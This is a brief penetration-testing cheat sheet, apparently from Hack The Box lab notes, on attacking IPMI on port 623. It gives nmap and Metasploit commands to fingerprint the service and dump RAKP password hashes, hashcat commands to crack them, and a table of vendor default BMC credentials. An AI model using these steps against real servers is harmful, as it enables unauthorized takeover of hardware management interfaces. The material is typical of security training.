[623] IPMI

IPMI (Port: 623)

# Footprint the service
Intrusionz3r0X@htb[/htb]$ sudo nmap -sU --script ipmi-version -p 623 ilo.inlanfreight.local

# Get the IPMI version
msf6 > use auxiliary/scanner/ipmi/ipmi_version

# Dump hashes with Metasploit
msf6 > use auxiliary/scanner/ipmi/ipmi_dumphashes

Brute-force the password hash

| Hash mode | Hash name | Hash example |
|---|---|---|
| 7300 | IPMI2 RAKP HMAC-SHA1 | b7c2d6f13a43dce2e44ad120a9cd8a13d0ca23f0414275c0bbe1070d2d1299b1c04da0f1a0f1e4e2537300263a2200000000000000000000140768617368636174:472bdabe2d5d4bffd6add7b3ba79a291d104a9ef |

Intrusionz3r0X@htb[/htb]$ hashcat -m 7300 hash /usr/share/wordlists/rockyou.txt
Intrusionz3r0X@htb[/htb]$ hashcat -m 7300 ipmi.txt -a 3 '?1?1?1?1?1?1?1?1' -1 '?d?u'

Default passwords

| Product | Username | Password |
|---|---|---|
| Dell iDRAC | root | calvin |
| HP iLO | Administrator | randomized 8-character string consisting of numbers and uppercase letters |
| Supermicro IPMI | ADMIN | ADMIN |